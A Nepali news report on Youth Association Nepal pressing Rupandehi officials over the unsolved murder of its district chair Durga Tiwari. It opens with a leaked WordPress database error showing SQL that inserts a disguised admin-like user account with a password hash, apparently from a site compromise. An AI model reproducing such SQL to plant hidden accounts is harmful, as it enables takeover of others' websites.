WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BnM521524qNqwracnjsmgKShE/bPik.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-05 01:31:24', '', 'admlnlx', 'admlnlx')
भैरहवा,माघ २-
युवा संघ नेपाल रुपन्देहीका अध्यक्ष दुर्गा तिवारीको हत्यारा पत्ता लगाउन ढिलाई भएको भन्दै संगठनले आज (आईतबार) जिल्ला प्रशासन कार्यालय रुपन्देही र जिल्ला प्रहरी कार्यालय रुपन्देहीमा ज्ञापनपत्र बुझाएको छ ।
संगठनका केन्द्रिय सचिवालय सदस्य देवराज पोखरेल, जिल्ला कार्यवाहक अध्यक्ष नकुल शाही ठकुरी, एमाले जिल्ल सदस्य धर्मराज गिरी सहितको नेतृत्वमा जिल्ला प्रशासन कार्यालय र जिल्ला प्रहरी कार्यालय रुपन्देहीमा युवा संघका नेता, कार्यकर्ता पुगी हत्यारा पक्राउमा ढिलाई गरेको प्रति आक्रोश समेत व्यक्त गरेका थिए ।
सो क्रममा संघका सचिवालय सदस्य पोखरेलले रुपन्देही जिल्ला अध्यक्ष तिवारीको हत्याको एक महिना बित्न लाग्दा समेत हत्यारा पत्ता नलाग्नुले सो हत्यामा कतै राज्यकै संलग्नता छ की भन्ने आशंका उब्जिएको जनाएका छन् ।
संघले रुपन्देहीका प्रमुख जिल्ला अधिकारी विनोद प्रकाश सिंहलाई ज्ञापनपत्र बुझाउँदै दुर्गाको हत्यारा तत्काल पक्राउ गरी आजको ७ दिनभित्र सार्वजनिक नगरे कडा संघर्षका कार्यक्रम समेत गर्न बाध्य हुने चेतावनी दिएका थिए ।
संघको ज्ञापनपत्र बुझ्दै प्रमुख जिल्ला अधिकारी सिंहले ७ दिनभित्रमा जसरी पनि हत्यारा पत्ता लगाएर सार्वजनिक गर्न प्रतिबद्ध भएको जनाउँदै सो घटना स्थानीय भन्दा पनि राष्ट्रिय भएको हुँदा केन्द्रीय अनुसन्धान ब्युरो, गृह मन्त्रालयद्वारा गठित उच्चस्तरीय छानबिन आयोगले पनि केही दिनमै रिपोर्ट सार्वजनिक गर्ने जनाएका थिए ।
दुर्गाको हत्या भएपछि युवा संघ नेपाल केन्द्रिय कमिटीले कडा संघर्षको कार्यक्रम सार्वजनिक गरेतापनि हत्यारा छिट्टै पत्ता लगाउने गृह प्रशासनको प्रतिबद्धता अनुसार तत्काललाई शान्तिपूर्ण आन्दोलनलाई जारी राखेको मा अब प्रशासनले मौनता साँधे युवा संघ आफैले हत्यारालाई खोजी कारबाही गर्न बाध्य हुने जिल्ला कार्यवाहक अध्यक्ष नकुल शाही ठकुरीले जनाए ।
युवा संघले दुर्गाको हत्या पश्चात पनि देवदह क्षेत्रमा युवा संघका कार्यकर्ता मिलन मल्ल माथि पनि राजनीतिक प्रतिशोधका आधारमा ज्यान मार्ने गरी भएको भौतिक आक्रमण प्रति पनि प्रशासनको ध्यानाकर्षण गराएको छ ।
अध्यक्ष तिवारीको हत्या भएपछि गृह मन्त्रालयले एआईजी विज्ञानराज शर्माको संयोजकत्वमा, नेपाल प्रहरीले लुम्बिनी अञ्चल प्रहरी प्रमुख एसएसपी शेर बहादुर बस्नेतको संयोजकत्वमा, युवा संघ नेपालले महासचिव किरण पौडेलको संयोजकत्वमा, छानबिन आयोग गठन गरेको थियो ।
सो तीनवटै आयोगको प्रतिवेदन अहिले सम्म सार्वजनिक हुन सकेका छैनन् । यद्यपी हत्या भएका तिवारीको परिवारलाई पूर्व प्रधानमन्त्री तथा एमाले अध्यक्ष केपी शर्मा ओली लगायत एमालेका शीर्षस्थ नेता, नेपाल प्रहरीका प्रमुख उपेन्द्रकान्त अर्याल सहितको टोलीले घरमै भेटी हत्यारा केही दिनमै पक्राउ गरेर कानुनी कठघरामा ल्याउने प्रतिबद्धता जनाएका थिए ।
तिवारीको हत्यामा संलग्न भएको भन्दै विभिन्न समूह र व्यक्तिले जिम्मेवारी लिएतापनि अहिलेसम्म कोही पनि पक्राउ नपर्दा रुपन्देहीमा आम सर्वसाधारण त्रसित भएका छन् ।